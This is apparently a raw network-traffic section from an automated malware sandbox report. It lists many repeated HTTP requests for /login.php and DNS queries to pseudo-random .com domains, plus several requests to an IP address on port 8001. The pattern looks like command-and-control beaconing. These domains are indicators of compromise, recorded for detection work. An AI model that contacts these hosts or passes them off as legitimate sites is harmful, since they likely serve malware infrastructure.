Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyqah.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vocyzit.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vonypom.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vojyqem.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qetyfuv.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lymyxid.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galyqaz.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyfyj.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: www.gahyqah.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vojyqem.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galyqaz.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: pupydeq.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: pupycag.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyrysor.com
Source: global trafficHTTP traffic detected: GET /dh/147287063_414682.html HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: 106.15.36.143:8001Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyrysor.com
Source: global trafficHTTP traffic detected: GET /dh/147287063_414682.html HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: 106.15.36.143:8001Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galynuh.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyval.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyciz.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyval.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyxynyx.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qexyhuv.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vofycot.com
Source: global trafficHTTP traffic detected: GET /login.php?subid1=20240908-1853-3379-8a1b-ce08bd3461b1 HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww25.lyxynyx.comConnection: Keep-AliveCookie: __tad=1725785613.7387215
Source: global trafficHTTP traffic detected: GET /login.php?sub1=20240908-1853-34e6-b36e-a2256d9e0a9e HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww16.vofycot.comConnection: Keep-AliveCookie: __tad=1725785614.8678415
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qetyhyg.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyhub.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyhub.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lygyvuj.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyhiz.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyfyj.comCookie: sid=b166d882-6dbf-11ef-90a1-9c5e8dd41795
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galyqaz.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vojyqem.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyqah.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: www.gahyqah.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vojyqem.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galyqaz.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyrysor.com
Source: global trafficHTTP traffic detected: GET /dh/147287063_414682.html HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: 106.15.36.143:8001Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyrysor.com
Source: global trafficHTTP traffic detected: GET /dh/147287063_414682.html HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: 106.15.36.143:8001Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyxynyx.comCookie: __tad=1725785613.7387215
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vofycot.comCookie: __tad=1725785614.8678415
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyval.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyval.com
Source: global trafficHTTP traffic detected: GET /login.php?subid1=20240908-1854-12c0-8240-bdabdc5d8efa HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww25.lyxynyx.comConnection: Keep-AliveCookie: __tad=1725785613.7387215
Source: global trafficHTTP traffic detected: GET /login.php?sub1=20240908-1854-132f-8c2f-134916a1e9d0 HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww16.vofycot.comConnection: Keep-AliveCookie: __tad=1725785614.8678415
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyhub.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyhub.com
Source: global trafficDNS traffic detected: DNS query: lygygin.com
Source: global trafficDNS traffic detected: DNS query: galykes.com
Source: global trafficDNS traffic detected: DNS query: lysynur.com
Source: global trafficDNS traffic detected: DNS query: vonypom.com
Source: global trafficDNS traffic detected: DNS query: qekykev.com
Source: global trafficDNS traffic detected: DNS query: pupybul.com
Source: global trafficDNS traffic detected: DNS query: ganypih.com
Source: global trafficDNS traffic detected: DNS query: vopybyt.com
Source: global trafficDNS traffic detected: DNS query: lykyjad.com
Source: global trafficDNS traffic detected: DNS query: qetyvep.com
Source: global trafficDNS traffic detected: DNS query: vojyjof.com
Source: global trafficDNS traffic detected: DNS query: puvytuq.com
Source: global trafficDNS traffic detected: DNS query: gahyhob.com
Source: global trafficDNS traffic detected: DNS query: lyryvex.com
Source: global trafficDNS traffic detected: DNS query: vocyruk.com
Source: global trafficDNS traffic detected: DNS query: qegyhig.com
Source: global trafficDNS traffic detected: DNS query: gatyvyz.com
Source: global trafficDNS traffic detected: DNS query: lymysan.com
Source: global trafficDNS traffic detected: DNS query: gahyqah.com
Source: global trafficDNS traffic detected: DNS query: lyryfyd.com
Source: global trafficDNS traffic detected: DNS query: vocyzit.com
Source: global trafficDNS traffic detected: DNS query: purydyv.com
Source: global trafficDNS traffic detected: DNS query: qegyqaq.com
Source: global trafficDNS traffic detected: DNS query: lyvytuj.com
Source: global trafficDNS traffic detected: DNS query: puvyxil.com
Source: global trafficDNS traffic detected: DNS query: purycap.com
Source: global trafficDNS traffic detected: DNS query: gacyryw.com
Source: global trafficDNS traffic detected: DNS query: lygymoj.com
Source: global trafficDNS traffic detected: DNS query: gacyzuz.com
Source: global trafficDNS traffic detected: DNS query: lyvyxor.com
Source: global trafficDNS traffic detected: DNS query: qekyqop.com
Source: global trafficDNS traffic detected: DNS query: qetyfuv.com
Source: global trafficDNS traffic detected: DNS query: qexyryl.com
Source: global trafficDNS traffic detected: DNS query: pufygug.com
Source: global trafficDNS traffic detected: DNS query: gaqycos.com
Source: global trafficDNS traffic detected: DNS query: gatyfus.com
Source: global trafficDNS traffic detected: DNS query: vowydef.com
Source: global trafficDNS traffic detected: DNS query: vowycac.com
Source: global trafficDNS traffic detected: DNS query: volykyc.com
Source: global trafficDNS traffic detected: DNS query: pujyjav.com
Source: global trafficDNS traffic detected: DNS query: qebytiq.com
Source: global trafficDNS traffic detected: DNS query: gadyniw.com
Source: global trafficDNS traffic detected: DNS query: pumypog.com
Source: global trafficDNS traffic detected: DNS query: puzylyp.com
Source: global trafficDNS traffic detected: DNS query: vofymik.com
Source: global trafficDNS traffic detected: DNS query: lyxylux.com
Source: global trafficDNS traffic detected: DNS query: gaqydeb.com
Source: global trafficDNS traffic detected: DNS query: qedynul.com
Source: global trafficDNS traffic detected: DNS query: qexylup.com
Source: global trafficDNS traffic detected: DNS query: lyxywer.com
Source: global trafficDNS traffic detected: DNS query: qeqysag.com
Source: global trafficDNS traffic detected: DNS query: vojyqem.com
Source: global trafficDNS traffic detected: DNS query: pufymoq.com
Source: global trafficDNS traffic detected: DNS query: lymyxid.com
Source: global trafficDNS traffic detected: DNS query: volyqat.com
Source: global trafficDNS traffic detected: DNS query: gadyfuh.com
Source: global trafficDNS traffic detected: DNS query: qedyfyq.com
Source: global trafficDNS traffic detected: DNS query: galyqaz.com
Source: global trafficDNS traffic detected: DNS query: lysyfyj.com
Source: global trafficDNS traffic detected: DNS query: vonyzuf.com
Source: global trafficDNS traffic detected: DNS query: pumyxiv.com
Source: global trafficDNS traffic detected: DNS query: qeqyxov.com
Source: global trafficDNS traffic detected: DNS query: vofygum.com
Source: global trafficDNS traffic detected: DNS query: puzywel.com
Source: global trafficDNS traffic detected: DNS query: www.gahyqah.com
Source: global trafficDNS traffic detected: DNS query: lykymox.com
Source: global trafficDNS traffic detected: DNS query: qebylug.com
Source: global trafficDNS traffic detected: DNS query: ganyzub.com
Source: global trafficDNS traffic detected: DNS query: pujymip.com
Source: global trafficDNS traffic detected: DNS query: vopydek.com
Source: global trafficDNS traffic detected: DNS query: puvylyg.com
Source: global trafficDNS traffic detected: DNS query: pupydeq.com
Source: global trafficDNS traffic detected: DNS query: pupycag.com
Source: global trafficDNS traffic detected: DNS query: lykygur.com
Source: global trafficDNS traffic detected: DNS query: lyrysor.com
Source: global trafficDNS traffic detected: DNS query: qebyrev.com
Source: global trafficDNS traffic detected: DNS query: gatycoh.com
Source: global trafficDNS traffic detected: DNS query: pufybyv.com
Source: global trafficDNS traffic detected: DNS query: pujygul.com
Source: global trafficDNS traffic detected: DNS query: vowypit.com
Source: global trafficDNS traffic detected: DNS query: lymylyr.com
Source: global trafficDNS traffic detected: DNS query: gadydas.com
Source: global trafficDNS traffic detected: DNS query: volymum.com
Source: global trafficDNS traffic detected: DNS query: puzymig.com
Source: global trafficDNS traffic detected: DNS query: lygyfex.com
Source: global trafficDNS traffic detected: DNS query: qegyfyp.com
Source: global trafficDNS traffic detected: DNS query: gacyqob.com
Source: global trafficDNS traffic detected: DNS query: puryxuq.com
Source: global trafficDNS traffic detected: DNS query: qeqylyl.com
Source: global trafficDNS traffic detected: DNS query: vowyzuk.com
Source: global trafficDNS traffic detected: DNS query: qexyqog.com
Source: global trafficDNS traffic detected: DNS query: pufydep.com
Source: global trafficDNS traffic detected: DNS query: gaqyzuw.com
Source: global trafficDNS traffic detected: DNS query: lyxymin.com
Source: global trafficDNS traffic detected: DNS query: vofydac.com
Source: global trafficDNS traffic detected: DNS query: lygynud.com
